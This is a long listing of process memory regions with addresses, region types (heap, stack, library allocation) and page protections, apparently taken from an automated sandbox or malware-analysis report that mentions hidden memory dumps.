page read and write
3A55000
heap
page read and write
3A8C000
heap
page read and write
414B000
trusted library allocation
page read and write
7FF00132000
trusted library allocation
page execute and read and write
1E80000
trusted library allocation
page read and write
1F4E000
stack
page read and write
44D8000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
890000
heap
page read and write
2B58000
trusted library allocation
page read and write
358B000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
834E000
trusted library allocation
page read and write
3766000
trusted library allocation
page read and write
2ECC000
trusted library allocation
page read and write
3243000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
1CF0000
trusted library section
page read and write
45F000
heap
page read and write
32EF000
trusted library allocation
page read and write
324000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
2B24000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
2124000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
286D000
stack
page read and write
418D000
trusted library allocation
page read and write
243000
trusted library allocation
page read and write
8E9E000
trusted library allocation
page read and write
C0000
heap
page read and write
310000
heap
page read and write
3E2000
heap
page read and write
31A1000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
8E9E000
trusted library allocation
page read and write
3021000
trusted library allocation
page read and write
2D80000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
10057000
unkown
page read and write
2B58000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
37CA000
trusted library allocation
page read and write
3E4000
heap
page read and write
44DC000
trusted library allocation
page read and write
10000000
unkown
page readonly
32E2000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
32D9000
trusted library allocation
page read and write
2390000
heap
page read and write
32DD000
trusted library allocation
page read and write
3385000
trusted library allocation
page read and write
3B90000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
51CC000
heap
page read and write
44D3000
trusted library allocation
page read and write
7FF0004C000
trusted library allocation
page execute and read and write
358B000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
3385000
trusted library allocation
page read and write
BD8000
heap
page read and write
10053000
unkown
page read and write
2180000
heap
page read and write
2EAC000
trusted library allocation
page read and write
41C2000
trusted library allocation
page read and write
231000
stack
page read and write
3A8A000
heap
page read and write
23F2000
heap
page read and write
2B4E000
trusted library allocation
page read and write
41B8000
trusted library allocation
page read and write
7FF00207000
trusted library allocation
page read and write
2F2000
heap
page read and write
299000
heap
page read and write
374E000
trusted library allocation
page read and write
3619000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
3A41000
heap
page read and write
32EA000
trusted library allocation
page read and write
10E000
heap
page read and write
968000
heap
page read and write
418D000
trusted library allocation
page read and write
2F49000
trusted library allocation
page read and write
3E5000
heap
page read and write
325000
heap
page read and write
3D9000
heap
page read and write
2B67000
trusted library allocation
page read and write
2EF4000
trusted library allocation
page read and write
2D80000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
3AAE000
heap
page read and write
994000
trusted library allocation
page read and write
3A61000
heap
page read and write
3119000
trusted library allocation
page read and write
5652000
heap
page read and write
3578000
trusted library allocation
page read and write
1D00000
heap
page read and write
2B4E000
trusted library allocation
page read and write
359A000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
1D3000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
3A8E000
heap
page read and write
414B000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
3A31000
heap
page read and write
3A8A000
heap
page read and write
356C000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
228E000
stack
page read and write
41A1000
trusted library allocation
page read and write
90DE000
trusted library allocation
page read and write
2F7000
heap
page read and write
41A1000
trusted library allocation
page read and write
2CE0000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
9C0000
heap
page read and write
35C0000
heap
page read and write
3AA7000
heap
page read and write
2810000
trusted library allocation
page read and write
1B974000
trusted library allocation
page read and write
3E0000
heap
page read and write
3A90000
heap
page read and write
81DE000
trusted library allocation
page read and write
3548000
trusted library allocation
page read and write
10C000
heap
page read and write
32E7000
trusted library allocation
page read and write
3E2000
heap
page read and write
44D0000
trusted library allocation
page read and write
85EE000
trusted library allocation
page read and write
1CE2000
trusted library section
page read and write
5664000
heap
page read and write
32E7000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
3B6000
heap
page read and write
2CC000
heap
page read and write
2450000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
23B0000
trusted library allocation
page read and write
51EB000
heap
page read and write
356B000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
35B3000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
28CA000
trusted library allocation
page read and write
2673000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
8FDE000
trusted library allocation
page read and write
3B9000
heap
page read and write
3A8E000
heap
page read and write
96D000
heap
page read and write
418D000
trusted library allocation
page read and write
970000
trusted library allocation
page read and write
2F9E000
trusted library allocation
page read and write
41BA000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
3767000
trusted library allocation
page read and write
3584000
trusted library allocation
page read and write
5652000
heap
page read and write
3574000
trusted library allocation
page read and write
419A000
trusted library allocation
page read and write
3A9D000
heap
page read and write
377E000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
1E0000
heap
page read and write
3F0000
trusted library allocation
page read and write
100000
heap
page read and write
2820000
trusted library allocation
page read and write
3A86000
heap
page read and write
44E7000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
250000
heap
page read and write
3A7F000
heap
page read and write
32D0000
trusted library allocation
page read and write
3AA7000
heap
page read and write
374E000
trusted library allocation
page read and write
3482000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
2FE0000
trusted library allocation
page read and write
2E7000
heap
page read and write
41BA000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
41BA000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
1CD90000
heap
page read and write
2B4E000
trusted library allocation
page read and write
358D000
trusted library allocation
page read and write
244000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
10000
heap
page read and write
3AC9000
heap
page read and write
520D000
heap
page read and write
3A86000
heap
page read and write
3DE000
heap
page read and write
450000
trusted library allocation
page read and write
23A000
heap
page read and write
377C000
trusted library allocation
page read and write
3AB1000
heap
page read and write
3A7B000
heap
page read and write
396000
heap
page read and write
6FE000
heap
page read and write
2B60000
trusted library allocation
page read and write
32DD000
trusted library allocation
page read and write
12DF1000
trusted library allocation
page read and write
5A0000
heap
page read and write
3AA7000
heap
page read and write
441000
heap
page read and write
3180000
trusted library allocation
page read and write
356E000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
21FC000
stack
page read and write
41C2000
trusted library allocation
page read and write
3AD0000
trusted library allocation
page read and write
32D5000
trusted library allocation
page read and write
2CC000
heap
page read and write
3AA5000
heap
page read and write
31F0000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
2B24000
trusted library allocation
page read and write
30B0000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
2B14000
trusted library allocation
page read and write
3A48000
heap
page read and write
1C8CD000
stack
page read and write
2C0000
heap
page read and write
32E8000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
352000
heap
page read and write
3A08000
heap
page read and write
23E0000
heap
page read and write
323000
trusted library allocation
page read and write
358B000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
41CF000
trusted library allocation
page read and write
6A3000
trusted library allocation
page read and write
3A32000
heap
page read and write
1005A000
unkown
page readonly
53C0000
trusted library allocation
page read and write
236E000
stack
page read and write
1C7A0000
heap
page read and write
2A4D000
stack
page read and write
410000
heap
page read and write
2E0000
heap
page read and write
2B67000
trusted library allocation
page read and write
3A90000
heap
page read and write
2B4E000
trusted library allocation
page read and write
358A000
trusted library allocation
page read and write
3E7000
heap
page read and write
1B4000
heap
page read and write
414B000
trusted library allocation
page read and write
32D9000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
23B0000
trusted library allocation
page read and write
51C7000
heap
page read and write
7FF00280000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
3A6B000
heap
page read and write
7FF00032000
trusted library allocation
page execute and read and write
3760000
trusted library allocation
page read and write
41B8000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
99A000
heap
page read and write
41D0000
heap
page read and write
3180000
trusted library allocation
page read and write
2AB0000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
328E000
trusted library allocation
page read and write
FB000
stack
page read and write
8F3E000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
1B78A000
heap
page read and write
834E000
trusted library allocation
page read and write
3558000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
32D9000
trusted library allocation
page read and write
330000
heap
page read and write
90DE000
trusted library allocation
page read and write
2ED2000
trusted library allocation
page read and write
414B000
trusted library allocation
page read and write
310000
heap
page read and write
2B65000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
41A1000
trusted library allocation
page read and write
44D3000
trusted library allocation
page read and write
4190000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
81DE000
trusted library allocation
page read and write
303D000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
358D000
trusted library allocation
page read and write
44E7000
trusted library allocation
page read and write
2674000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
4200000
trusted library allocation
page read and write
3A44000
heap
page read and write
3A48000
heap
page read and write
31A3000
trusted library allocation
page read and write
3C8000
heap
page read and write
44D3000
trusted library allocation
page read and write
32DD000
trusted library allocation
page read and write
351D000
trusted library allocation
page read and write
10053000
unkown
page read and write
71E000
heap
page read and write
32E7000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
BD0000
heap
page read and write
3110000
trusted library allocation
page read and write
86E000
stack
page read and write
351D000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
441000
heap
page read and write
23D0000
heap
page read and write
3A8C000
heap
page read and write
2B67000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
2F2000
heap
page read and write
351D000
trusted library allocation
page read and write
648000
heap
page read and write
32DD000
trusted library allocation
page read and write
6A0000
heap
page read and write
3587000
trusted library allocation
page read and write
346000
heap
page read and write
3D0000
heap
page read and write
44D0000
trusted library allocation
page read and write
2B67000
trusted library allocation
page read and write
8DDE000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
418D000
trusted library allocation
page read and write
9C4000
heap
page read and write
35C3000
trusted library allocation
page read and write
2B65000
trusted library allocation
page read and write
830E000
trusted library allocation
page read and write
44DC000
trusted library allocation
page read and write
3578000
trusted library allocation
page read and write
5205000
heap
page read and write
1B9A0000
remote allocation
page read and write
32DD000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
358D000
trusted library allocation
page read and write
29E000
heap
page read and write
41CF000
trusted library allocation
page read and write
305000
heap
page read and write
914E000
trusted library allocation
page read and write
There are 1655 hidden memdumps, click here to show them.